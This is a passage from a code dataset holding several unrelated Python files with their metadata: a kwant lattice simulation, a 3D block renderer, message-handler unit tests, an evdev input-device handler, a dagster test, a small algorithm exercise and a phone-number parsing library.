t_nn3_b\n\n\t# left lead\n\tsym0 = kwant.TranslationalSymmetry(graphene.vec((-1, 0)))\n\tsym0.add_site_family(graphene.sublattices[0], other_vectors=[(-1, 2)])\n\tsym0.add_site_family(graphene.sublattices[1], other_vectors=[(-1, 2)])\n\n\tdef lead0_shape(pos):\n\t\tx, y = pos\n\t\treturn (-(W/2+Wex) < y <= (W/2+Wex))\n\n\tlead0 = kwant.Builder(sym0)\n\tlead0[graphene.shape(lead0_shape, (0, 0))] = np.zeros((2,2))\n\tlead0[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\t#lead0[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\t#lead0[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\t#lead0[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\t#lead0[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\t#lead0[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\t#lead0[kwant.builder.HoppingKind((1, -1), b, b)] = t_nn3_b\n\n\t# right lead\n\tsym1 = kwant.TranslationalSymmetry(graphene.vec((1, 0)))\n\tsym1.add_site_family(graphene.sublattices[0], other_vectors=[(-1, 2)])\n\tsym1.add_site_family(graphene.sublattices[1], other_vectors=[(-1, 2)])\n\n\tdef lead1_shape(pos):\n\t\tx, y = pos\n\t\treturn (-(W/2+Wex) < y <= (W/2+Wex))\n\n\tlead1 = kwant.Builder(sym1)\n\tlead1[graphene.shape(lead1_shape, (0, 0))] = np.zeros((2,2))\n\tlead1[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\t#lead1[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\t#lead1[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\t#lead1[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\t#lead1[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\t#lead1[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\t#lead1[kwant.builder.HoppingKind((1, -1), b, b)] = t_nn3_b\n\n\t# dummy lead\n\tdum_sym = kwant.TranslationalSymmetry(graphene.vec((1, 0)))\n\tdum_sym.add_site_family(graphene.sublattices[0], other_vectors=[(-1, 2)])\n\tdum_sym.add_site_family(graphene.sublattices[1], other_vectors=[(-1, 2)])\n\t\n\tdef dum_lead_shape(pos):\n\t\tx, y = pos\n\t\treturn (-(W/2+Wex) < y <= (W/2+Wex))\n\n\tdum_lead = kwant.Builder(dum_sym)\n\tdum_lead[graphene.shape(dum_lead_shape, (0, 0))] = dummy\n\tdum_lead[[kwant.builder.HoppingKind(*hopping) for hopping in hoppings]] = -t*np.eye(2)\n\tdum_lead[kwant.builder.HoppingKind((1, 0), a, a)] = t_nn1_a\n\tdum_lead[kwant.builder.HoppingKind((1, 0), b, b)] = t_nn1_b\n\tdum_lead[kwant.builder.HoppingKind((0, 1), a, a)] = t_nn2_a\n\tdum_lead[kwant.builder.HoppingKind((0, 1), b, b)] = t_nn2_b\n\tdum_lead[kwant.builder.HoppingKind((1, -1), a, a)] = t_nn3_a\n\tdum_lead[kwant.builder.HoppingKind((1, -1), b, b)] = t_nn3_b\n\n\treturn syst, [lead0, lead1], dum_lead\n \nW = 90*sqrt(3)\n# L = 100\n# t = 1.3\n# grid = (1/2)*sqrt(3)*pi*(t/W)\n# E = t/3\n# U = E\n# print(E)\n# lambda_so = 0.04\n# delta = -1*(0.1+lambda_so)\n# print(np.abs(delta)-lambda_so)\n# U_disorder = 0*(np.abs(delta)-lambda_so)\n# print(U_disorder)\n# Px = 0\n# Py = 0\n# Pz = 0\n# salt = 0\n\n# params = dict(U = U, U_disorder = U_disorder, Mex = 0, Px = Px, Py = Py, Pz = Pz, salt = salt)\n\n# syst, leads, dum_lead = make_system(W = W, L = L, delta = delta, t = t, lambda_so = lambda_so)\n\n# #def family_colors(site):\n# #\treturn 0 if (site.family == a) else 1\n# # Plot the closed system without leads.\n# #kwant.plot(syst, site_color=family_colors, site_lw=0.1, colorbar=False)\n\n# for lead in leads:\n\t# syst.attach_lead(lead)\n\n# syst = syst.finalized()\n# #kwant.plot(syst, site_lw=0.1, colorbar=False)\n\n# print('hi')\n# local_dos = kwant.ldos(syst,energy=E,params=params)\n# kwant.plotter.map(syst, local_dos[1::2],vmax = 0.01, num_lead_cells=0, a=1/sqrt(3))\n\n \n \n \n ","sub_path":"silicene_lattice_test.py","file_name":"silicene_lattice_test.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"364025693","text":"import operator as op\nfrom typing import TYPE_CHECKING, List, Tuple, Dict\n\nimport numpy as np\n\nfrom utils import get_odd_even\n\nif TYPE_CHECKING:\n from .classes import Block\n\n\nclass ElementRenderer:\n \"\"\"\n Render based on the `elements` prop of the model\n \"\"\"\n\n @property\n def directions(self):\n \"\"\"\n :return: Dictionary containing the direction vectors of the plane\n \"\"\"\n return {\n # X-Z plane\n 'down': ([1, 0, 0], [0, 0, 1]),\n 'up': ([1, 0, 0], [0, 0, 1]),\n # Y-Z plane\n 'east': ([0, 0, 1], [0, 1, 0]),\n 'west': ([0, 0, 1], [0, 1, 0]),\n # X-Y plane\n 'north': ([1, 0, 0], [0, 1, 0]),\n 'south': ([1, 0, 0], [0, 1, 0]),\n }\n\n @property\n def start_change(self):\n return {\n # one higher than down\n 'up': np.array([0, 1, 0]),\n # one to the right respective to east\n 'west': np.array([1, 0, 0]),\n # one forward respective to north\n 'south': np.array([0, 0, 1]),\n }\n\n def get_side_vertices(self, start: np.array, face: Tuple[str, Dict]):\n name, values = face\n # direction vectors multiplications\n r, s = get_odd_even(values.get('uv', [0, 0, 16, 16]))\n r = op.sub(*r[::-1]) * (1 / 16) # x direction\n s = op.sub(*s[::-1]) * (1 / 16) # z direction\n\n # use direction vectors to get the vertices of the plane\n u, v = np.array(self.directions[name])\n # the points have to be in this order!!\n p2 = start + r * u\n p3 = start + r*u + s*v\n p4 = start + s * v\n return np.array([start, p2, p3, p4]).flatten()\n\n def __call__(self, parent: \"Block\", *args, **kwargs) -> List[Tuple[str, np.array]]:\n for element in parent.model.elements:\n\n # change start based on face\n # e.g. move start up by 1 if we are on face='up'\n dx, dy, dz = (np.array(element['to']) - np.array(element['from'])) * (1 / 16)\n start_shift = {\n # one higher than down\n 'up': np.array([0, dy, 0]),\n # one to the right respective to east\n 'west': np.array([dx, 0, 0]),\n # one forward respective to north\n 'south': np.array([0, 0, dz]),\n }\n\n for face in element['faces'].items():\n face: Tuple[str, Dict]\n\n start = np.array(element['from']) * (1/16) + np.array(parent.pos)\n shift = start_shift.get(face[0], np.array([0, 0, 0]))\n start += shift\n\n vertices = self.get_side_vertices(start, face)\n\n # get texture (#{name}) refers to texture set on the model\n texture_name = face[1]['texture'][1:]\n face_texture = parent.model.textures[texture_name]\n yield face_texture, vertices\n\n\nif __name__ == '__main__':\n from utils.classes import Model, Block\n b = Block(0, 0, 0, 3)\n b.model = Model.from_name('spruce_stairs')\n b.get_faces()\n","sub_path":"utils/renders.py","file_name":"renders.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"557977745","text":"\"\"\"\nCopyright 2021 Mohamed Khalil\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\n__REQUIRED__ = ['problem_type', 'IC_type', 'realplot', 'makeplot', 'time_it', 't_final', 'time_integrator',\n 'flux_function', 'CFL', 'flux_function', 'reconstruction_type', 'finite_volume_method', 'flux_limiter',\n 'gamma', 'R', 'rho_inf', 'a_inf', 'nx', 'ny', 'mesh_name', 'profile']\n\n__OPTIONAL__ = ['alpha', 'write_time']\n\n\nclass ProblemInput:\n def __init__(self, input_dict: dict, mesh_dict: dict):\n \"\"\"\n Sets required input parametes from input parameter dict. Initialized values to default, with the correct type\n \"\"\"\n\n # Check input dictionary to check if all required fields are present\n self._check_input_dict(input_dict)\n\n # REQUIRED\n\n # General parameters\n for req_name in __REQUIRED__:\n self.__setattr__(req_name, input_dict[req_name])\n\n self.n = input_dict['nx'] * input_dict['ny']\n self.mesh_inputs = mesh_dict\n\n # OPTIONAL\n for opt_name in __OPTIONAL__:\n if opt_name in input_dict.keys():\n self.__setattr__(opt_name, input_dict[opt_name])\n\n @staticmethod\n def _check_input_dict(input_dict):\n for key in __REQUIRED__:\n if key not in input_dict.keys():\n raise KeyError(key + ' not found in inputs.')\n","sub_path":"pyHype/input/input_file_builder.py","file_name":"input_file_builder.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"460461796","text":"'''\nCreated on 27 Dec 2013\n\n@author: kevin\n'''\nimport unittest\nimport queue\nfrom messagehandler.messagehandler import NoResponseQueueDefined\nfrom messagehandler.messagehandler import NoMessageDefined\nfrom messagehandler.messagehandler import MessageHandler\nfrom keywordhandler.echohandler import EchoHandler\n\n\nclass Test(unittest.TestCase):\n\n\n def setUp(self):\n self.queue = queue.Queue()\n self.mh = MessageHandler(self.queue)\n \n # Register the echo handler as well\n EchoHandler(self.mh)\n \n self.message_a = \"@ help blabla\"\n self.message_b = \"@ foo\"\n self.message_c = \"@ echo my_echo\"\n\n def tearDown(self):\n pass\n\n def test_no_response_queue_defined(self):\n self.assertRaises(NoResponseQueueDefined, lambda: MessageHandler())\n\n def test_response_queue_defined(self):\n q = queue.Queue()\n MessageHandler(q)\n self.assertTrue(True, \"No exception should be raised\")\n \n def test_no_message_defined(self):\n self.assertRaises(NoMessageDefined, lambda: self.mh.handle(None, None))\n \n \n \n def test_tokenize_message_a(self):\n t = self.mh.tokenize(self.message_a)\n self.assertEqual(\"@\", t.magic_token(), \"Magic token must be '@'\")\n self.assertEqual(\"help\", t.keyword(), \"Keyword must be 'help'\")\n self.assertEqual(\"blabla\", t.string(), \"String must be 'blabla'\")\n \n def test_message_a_defined(self):\n self.mh.handle(None, self.message_a)\n m = self.queue.get()\n self.assertTrue(m.response().string.startswith(\"Usage information\"), \"Should provide usage information\")\n \n \n \n def test_tokenize_message_b(self):\n t = self.mh.tokenize(self.message_b)\n self.assertEqual(\"@\", t.magic_token(), \"Magic token must be '@'\")\n self.assertEqual(\"foo\", t.keyword(), \"Keyword must be 'foo'\")\n self.assertEqual(\"\", t.string(), \"String must be empty\")\n\n def test_message_b_defined(self):\n self.mh.handle(None, self.message_b)\n m = self.queue.get()\n self.assertTrue(m.response().string.startswith(\"Sorry, I don't understand the command\"), \"Should provide usage information\")\n self.assertTrue(self.queue.empty())\n \n \n \n def test_tokenize_message_c(self):\n t = self.mh.tokenize(self.message_c)\n self.assertEqual(\"@\", t.magic_token(), \"Magic token must be '@'\")\n self.assertEqual(\"echo\", t.keyword(), \"Keyword must be 'echo'\")\n self.assertEqual(\"my_echo\", t.string(), \"String must be 'my_echo'\")\n \n def test_message_c_defined(self):\n self.mh.handle(None, self.message_c)\n m = self.queue.get()\n self.assertEqual(m.response().string, \"my_echo\", \"Should use the echo handler\")\n \n\n \n def test_nondefault_magic_token(self):\n message = \"# echo bar baz\"\n q = queue.Queue()\n mh = MessageHandler(response_queue = q, magic_token = \"#\")\n EchoHandler(mh)\n \n mh.handle(None, message)\n m = q.get()\n self.assertEqual(m.response().string, \"bar baz\", \"Should use the echo handler\")","sub_path":"src/messagehandler/messagehandler_test.py","file_name":"messagehandler_test.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"190281719","text":"'''\ncreated by goblinM\n打印两个有序链表的公共部分\n思路:\n1->2->3->5->6->7\n2->4->5->6->8\n公有部分:2,5,6\n ·head1.val < head2.val,head1下移\n ·head1.val > head2.val,head2下移\n ·head1.val == head2.val 打印这个值,存入,head1,head2都下移\n ·head1 或者head2中移动到none,则停止\n'''\n\nclass LinkNode:\n def __init__(self,val,next=None):\n self.val = val\n self.next = next\n\nclass CommonLink:\n def get_common(self,link1,link2):\n head1 = link1\n head2 = link2\n res = []\n while head1 and head2:\n if head1.val< head2.val:\n head1 = head1.next\n elif head1.val > head2.val:\n head2 = head2.next\n else:\n res.append(head1.val)\n head1 = head1.next\n head2 = head2.next\n\n return res\n\nif __name__ == \"__main__\":\n obj = CommonLink()\n link1 = LinkNode(1,LinkNode(2,LinkNode(3,LinkNode(5,LinkNode(6,LinkNode(7))))))\n link2 = LinkNode(1, LinkNode(2, LinkNode(4, LinkNode(5, LinkNode(6, LinkNode(8))))))\n print(obj.get_common(link1,link2))","sub_path":"pythonPractices/link/common_link.py","file_name":"common_link.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"214637318","text":"# Copyright (c) 2016, Jacek Konieczny\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport time\nimport logging\nimport re\nimport math\nimport asyncio\n\nimport evdev\nfrom evdev.ecodes import EV_KEY, EV_ABS\n\nfrom .base import EventHandler, BaseInputDevice\n\nlogger = logging.getLogger(\"input.evdev\")\n\nclass KeyEventHandler(EventHandler):\n def interpret_event(self, event):\n if event.keystate == event.key_down:\n return \"on\"\n elif event.keystate == event.key_up:\n return \"off\"\n else:\n return \"ignore\"\n\nclass AbsEventHandler(EventHandler):\n def __init__(self, device, key, settings):\n super().__init__(device, key, settings)\n self._last_value = None\n self._last_value_ts = None\n self._min = None\n self._max = None\n self._thres_low = None\n self._thres_high = None\n self._velocity = None\n self._velocity_coeff = float(settings.get(\"velocity_coeff\", 2.0))\n etype, ecode = key\n abs_caps = device.device.capabilities(absinfo=True)[etype]\n for code, absinfo in abs_caps:\n if code == ecode:\n break\n else:\n logger.error(\"Cannot retrieve absinfo for %r\", ecode)\n return\n self._min = absinfo.min\n self._max = absinfo.max\n self._range = absinfo.max - absinfo.min\n def val_to_abs(val):\n if not val.endswith(\"%\"):\n return float(val)\n pcent = float(val[:-1])\n return self._min + pcent * (self._max - self._min) / 100.0\n if \"thres_low\" in settings:\n self._thres_low = val_to_abs(settings[\"thres_low\"])\n else:\n self._thres_low = self._min\n if \"thres_high\" in settings:\n self._thres_high = val_to_abs(settings[\"thres_high\"])\n else:\n self._thres_high = self._max\n\n def get_velocity(self):\n if self._velocity is not None:\n return self._velocity\n else:\n return super().get_velocity()\n\n def _compute_velocity(self, value, event_ts):\n if not self._range:\n self._velocity = None\n return\n rel_change = float(value - self._last_value) / self._range\n if rel_change > 0 and self._last_value < self._thres_low:\n # the low value could be collected before the move started\n velocity = math.inf\n elif rel_change < 0 and self._last_value > self._thres_high:\n # the high value can be collected before the move started\n velocity = math.inf\n else:\n time_change = event_ts - self._last_value_ts\n velocity = abs(rel_change / time_change)\n logger.debug(\"unscaled velocity: %f\", velocity)\n if velocity != math.inf:\n velocity = int(velocity * self._velocity_coeff)\n if velocity < 0:\n self._velocity = 0\n elif velocity > 127:\n self._velocity = 127\n else:\n self._velocity = velocity\n\n def interpret_event(self, event):\n value = event.event.value\n event_ts = event.event.timestamp()\n if self._last_value is None:\n result = \"ignore\"\n elif value > self._last_value:\n # rising\n if value > self._thres_high and self._last_value < self._thres_high:\n result = \"on\"\n self._compute_velocity(value, event_ts)\n else:\n result = \"ignore\"\n elif value < self._last_value:\n # falling\n if value < self._thres_low and self._last_value > self._thres_low:\n result = \"off\"\n self._compute_velocity(value, event_ts)\n else:\n result = \"ignore\"\n else:\n result = \"ignore\"\n self._last_value = value\n self._last_value_ts = event_ts\n return result\n\nclass EventDevice(BaseInputDevice):\n def __init__(self, config, section, main_loop, device):\n self._done = False\n self.device = device\n self.name = \"{} ({})\".format(device.name, device.fn)\n self._event_map = {}\n BaseInputDevice.__init__(self, config, section, main_loop)\n\n def load_keymap(self):\n \"\"\"Process `self.keymap_config` ConfigParser object to build internal\n input event to EventHandler object mapping.\n \"\"\"\n for section in self.keymap_config:\n if section.startswith(\"KEY_\") or section.startswith(\"BTN_\"):\n try:\n ecode = evdev.ecodes.ecodes[section]\n except KeyError:\n logger.warning(\"Unknown key name: %r\", section)\n continue\n handler_class = KeyEventHandler\n ev_type = EV_KEY\n elif section.startswith(\"ABS_\"):\n try:\n ecode = evdev.ecodes.ecodes[section]\n except KeyError:\n logger.warning(\"Unknown axis name: %r\", section)\n continue\n handler_class = AbsEventHandler\n ev_type = EV_ABS\n else:\n continue\n key = (ev_type, ecode)\n settings = self.keymap_config[section]\n handler = handler_class(self, key, settings)\n self._event_map[key] = handler\n\n def stop(self):\n \"\"\"Stop processing events.\"\"\"\n self._done = True\n self.device.close()\n\n async def __aiter__(self):\n return self\n\n async def __anext__(self):\n async for event in self.device.async_read_loop():\n if self._done:\n raise StopAsyncIteration\n ev_type = event.type\n ev_code = event.code\n event = evdev.categorize(event)\n handler = self._event_map.get((ev_type, ev_code))\n if handler:\n msg = handler.translate(event)\n if msg is not None:\n return msg\n async def get_key(self):\n \"\"\"Read single keypress from the device.\"\"\"\n key_name = None\n try:\n # flush queued events\n self.device.read()\n except BlockingIOError:\n pass\n async for event in self.device.async_read_loop():\n ev_type = event.type\n ev_code = event.code\n key_name = evdev.ecodes.bytype[ev_type].get(ev_code, str(ev_code))\n if ev_type == EV_KEY:\n key_event = evdev.events.KeyEvent(event)\n if key_event.keystate != key_event.key_down:\n continue\n else:\n # FIXME: EV_ABS\n continue\n break\n if isinstance(key_name, list):\n key_name = key_name[0]\n return key_name\n\ndef input_device_factory(config, section, main_loop):\n try:\n name = config[section][\"name\"]\n except KeyError:\n name = \".*\"\n input_device_re = re.compile(name)\n devices = [evdev.InputDevice(fn) for fn in evdev.list_devices()]\n devices = [dev for dev in devices if input_device_re.match(dev.name)]\n if not devices:\n logger.debug(\"[%s]: no device matches name %r\", section, name)\n return\n for device in devices:\n try:\n handler = EventDevice(config, section, main_loop, device)\n except Exception as err:\n logger.warning(\"[%s]: cannot load event device: %s\", section, err)\n logger.debug(\"Exception:\", exc_info=True)\n continue\n yield handler\n","sub_path":"badumtss_machine/input/evdev.py","file_name":"evdev.py","file_ext":"py","file_size_in_byte":8799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"373678608","text":"from dagster_graphql.test.utils import execute_dagster_graphql\n\nfrom .setup import define_test_context\n\nSNAPSHOT_QUERY = '''\nquery PipelineSnapshotQuery($snapshotId: String!) {\n pipelineSnapshot(snapshotId: $snapshotId) {\n name\n description\n runtimeTypes { key }\n solids { name }\n runs { runId } \n modes { name }\n solidHandles { handleID }\n tags { key value }\n }\n}\n'''\n\n\ndef test_query_snapshot(snapshot):\n result = execute_dagster_graphql(\n define_test_context(), SNAPSHOT_QUERY, {'snapshotId': 'csv_hello_world'}\n )\n\n assert not result.errors\n assert result.data\n\n snapshot.assert_match(result.data)\n","sub_path":"python_modules/dagster-graphql/dagster_graphql_tests/graphql/test_pipeline_snapshot.py","file_name":"test_pipeline_snapshot.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"496025353","text":"# TC: O(n log n) | SC: O(n)\ndef solution_1(packets, kids):\n # sort\n packets.sort()\n start = 0\n end = kids-1\n min_diff = packets[-1]-packets[0]\n\n # Check all possible subarry for min difference.\n while end < len(packets):\n min_diff = min(min_diff, (packets[end]-packets[start]))\n start += 1\n end += 1\n\n return min_diff\n\n\nif __name__ == '__main__':\n packets = [3, 4, 1, 9, 56, 7, 9, 12]\n kids = 5\n\n # packets = [7, 3, 2, 4, 9, 12, 56]\n # kids = 3\n\n # packets = [7, 3, 2, 4, 9, 12, 56]\n # kids = 3\n\n # packets = [3, 4, 1, 9, 56, 7, 9, 12]\n # kids = 5\n\n # packets = [12, 4, 7, 9, 2, 23, 25, 41, 30, 40, 28, 42, 30, 44, 48, 43, 50]\n # kids = 7\n\n print('solution_1: ', solution_1(packets, kids))\n","sub_path":"array/python3/30_chocolate_distribution.py","file_name":"30_chocolate_distribution.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"126378679","text":"\"\"\"\nCrappy phone number library.\n\nSee test_phonenumber.py for more information\n\"\"\"\n\nimport re\nimport urllib\n\nPHONENO_URI = re.compile(\"(<|^)(sip|sips|tel):(?P<phoneno>\\+?\\d+)\")\nNANP_NUMBER = re.compile(\"^(?P<npa>[2-9]\\d\\d)(?P<nxx>[2-9]\\d\\d)(?P<station>\\d\\d\\d\\d)$\")\nNANP_COUNTRIES = ('US', 'CA', 'BB', 'BM', 'JM', 'BS', 'GU', 'GD', 'PR',\n 'KN', 'MS', 'KY', 'DO', 'DM', 'LC', 'TT', 'TC', 'VC',\n 'AG', 'VG', 'AI', 'VI', 'AS')\nEU_COUNTRIES = ('AT', 'BE', 'BG', 'CY', 'CZ', 'DK', 'EE', 'FI', 'FR',\n 'DE', 'GR', 'HU', 'IE', 'IT', 'LV', 'LT', 'LU', 'MT',\n 'NL', 'PL', 'PT', 'RO', 'SK', 'SI', 'ES', 'SE', 'GB')\nCANADIAN_NPA = ('204', '250', '306', '403', '416', '418', '438',\n '450', '514', '519', '581', '604', '613', '647',\n '778', '289', '226', '587', '506', '705', '709',\n '807', '819', '867', '780', '902', '905')\nDOMINICAN_REPUBLIC_NPA = ('809', '829', '849')\nTOLL_FREE_NPA = ('800', '866', '877', '888')\nIS_PREMIUM_RATE = re.compile(\"^1900|^1[2-9]\\d\\d976\")\nCOUNTRY_DIALING_PREFIX = {\n 'US': '1',\n 'CA': '1',\n 'KY': '1',\n 'DO': '1',\n 'DM': '1',\n 'LC': '1',\n 'TT': '1',\n 'AS': '1',\n 'TC': '1',\n 'VC': '1',\n 'AG': '1',\n 'VG': '1',\n 'AI': '1',\n 'VI': '1',\n 'BB': '1',\n 'BM': '1',\n 'JM': '1',\n 'BS': '1',\n 'GU': '1',\n 'GD': '1',\n 'PR': '1',\n 'KN': '1',\n 'MS': '1',\n 'FR': '33',\n 'GB': '44',\n 'BE': '32',\n 'IT': '39',\n 'IR': '98',\n 'ES': '34',\n 'NL': '31',\n 'MX': '52',\n 'RU': '7',\n 'CN': '86',\n 'JP': '81',\n 'LT': '370',\n 'BD': '880',\n 'BF': '226',\n 'BG': '359',\n 'WF': '681',\n 'BN': '673',\n 'BO': '591',\n 'BH': '973',\n 'BI': '257',\n 'BJ': '229',\n 'BT': '975',\n 'BW': '267',\n 'WS': '685',\n 'BR': '55',\n 'BY': '375',\n 'BZ': '501',\n 'RW': '250',\n 'RE': '262',\n 'TM': '993',\n 'TJ': '992',\n 'RO': '40',\n 'TK': '690',\n 'GW': '245',\n 'GT': '502',\n 'GR': '30',\n 'GQ': '240',\n 'GP': '590',\n 'GY': '592',\n 'GF': '594',\n 'GE': '995',\n 'GA': '241',\n 'GN': '224',\n 'GM': '220',\n 'GL': '299',\n 'GI': '350',\n 'GH': '233',\n 'OM': '968',\n 'TN': '216',\n 'JO': '962',\n 'HT': '509',\n 'HU': '36',\n 'HK': '852',\n 'HN': '504',\n 'VE': '58',\n 'PS': '970',\n 'PW': '680',\n 'PT': '351',\n 'AF': '93',\n 'IQ': '964',\n 'PA': '507',\n 'PF': '689',\n 'PG': '675',\n 'PE': '51',\n 'PK': '92',\n 'PH': '63',\n 'PL': '48',\n 'ZM': '260',\n 'EE': '372',\n 'EG': '20',\n 'ZA': '27',\n 'EC': '593',\n 'VN': '84',\n 'ET': '251',\n 'SO': '252',\n 'ZW': '263',\n 'SA': '966',\n 'ER': '291',\n 'MD': '373',\n 'MG': '261',\n 'MA': '212',\n 'MC': '377',\n 'UZ': '998',\n 'MM': '95',\n 'ML': '223',\n 'MO': '853',\n 'MN': '976',\n 'MH': '692',\n 'MU': '230',\n 'MT': '356',\n 'MW': '265',\n 'MV': '960',\n 'MQ': '596',\n 'PY': '595',\n 'MR': '222',\n 'UG': '256',\n 'MY': '60',\n 'IL': '972',\n 'SH': '290',\n 'FI': '358',\n 'FJ': '679',\n 'FK': '500',\n 'FM': '691',\n 'NI': '505',\n 'NO': '47',\n 'NA': '264',\n 'VU': '678',\n 'NC': '687',\n 'NE': '227',\n 'NG': '234',\n 'NZ': '64',\n 'NP': '977',\n 'NR': '674',\n 'NU': '683',\n 'CK': '682',\n 'CI': '225',\n 'CH': '41',\n 'CO': '57',\n 'CM': '237',\n 'CL': '56',\n 'CG': '242',\n 'CF': '236',\n 'CD': '243',\n 'CZ': '420',\n 'CY': '357',\n 'CR': '506',\n 'CU': '53',\n 'SZ': '268',\n 'SY': '963',\n 'KG': '996',\n 'KE': '254',\n 'SR': '597',\n 'KI': '686',\n 'KH': '855',\n 'SV': '503',\n 'KM': '269',\n 'ST': '239',\n 'SK': '421',\n 'KR': '82',\n 'KP': '850',\n 'KW': '965',\n 'SN': '221',\n 'SM': '378',\n 'SL': '232',\n 'SC': '248',\n 'SB': '677',\n 'SG': '65',\n 'SE': '46',\n 'SD': '249',\n 'DJ': '253',\n 'DK': '45',\n 'DE': '49',\n 'YE': '967',\n 'DZ': '213',\n 'UY': '598',\n 'LB': '961',\n 'LA': '856',\n 'TV': '688',\n 'TW': '886',\n 'TR': '90',\n 'LK': '94',\n 'LI': '423',\n 'LV': '371',\n 'TO': '676',\n 'TL': '670',\n 'LU': '352',\n 'LR': '231',\n 'LS': '266',\n 'TH': '66',\n 'TG': '228',\n 'TD': '235',\n 'LY': '218',\n 'VA': '379',\n 'AC': '247',\n 'AE': '971',\n 'AD': '376',\n 'IS': '354',\n 'AM': '374',\n 'AL': '355',\n 'AO': '244',\n 'AN': '599',\n 'AR': '54',\n 'AU': '61',\n 'AT': '43',\n 'AW': '297',\n 'IN': '91',\n 'TZ': '255',\n 'AZ': '994',\n 'IE': '353',\n 'ID': '62',\n 'QA': '974',\n 'MZ': '258',\n 'UA': '380',\n 'CS': '381',\n 'HR': '385',\n 'SI': '386',\n 'BA': '387',\n 'MK': '389',\n}\n\ndef easy_parse(number, country='US', default=None):\n try:\n return add_plus(parse_pstn_number(strip_uri(number), country))\n except InvalidPSTNNumber:\n if default is not None:\n return default\n else:\n return number\n\ndef easy_format(number, country='US', default=None):\n try:\n return e164_format(parse_pstn_number(number, country), country)\n except InvalidPSTNNumber:\n if default is not None:\n return default\n else:\n return number\n\ndef strip_uri(uri):\n m = PHONENO_URI.search(urllib.unquote(uri))\n if m:\n return m.group('phoneno')\n else:\n return uri\n\ndef i_said_ascii_god_damnit(s):\n if not s:\n return ''\n if isinstance(s, str):\n s = s.decode('utf-8', 'ignore')\n assert isinstance(s, unicode)\n return s.encode('ascii', 'ignore')\n\nclass InvalidPSTNNumber(ValueError):\n def __init__(self, phoneno=None):\n self.phoneno = phoneno\n\n __str__ = lambda self: \"%s\" % (self.phoneno)\n __repr__ = lambda self: \"<%s: %s>\" % (self.__class__.__name__, self)\n\ndef e164_to_country(phoneno, default=None):\n \"\"\"Falls back to 'US' if not sure. Don't pass naked e164\"\"\"\n if not phoneno:\n return default\n (cdp, number) = e164_split(phoneno)\n if not cdp:\n return default\n if cdp == '1':\n if len(number) != 10:\n return 'US'\n if is_canadian(phoneno):\n return 'CA'\n if is_dominican_republic(phoneno):\n return 'DO'\n return 'US'\n for country, cdp2 in COUNTRY_DIALING_PREFIX.items():\n if cdp == cdp2:\n return country\n return default\n\ndef strip_prefixes(phoneno):\n phoneno = phoneno.lstrip('+')\n if phoneno.startswith('011'):\n phoneno = phoneno[3:]\n if phoneno.startswith('00'):\n phoneno = phoneno[2:]\n return phoneno\n\ndef e164_split(phoneno):\n \"\"\"\n Heuristic to take a phone number and return a tuple with the\n country dialing prefix and digits after the country prefix.\n Returns (None, None) if it gets confused.\n\n Supports 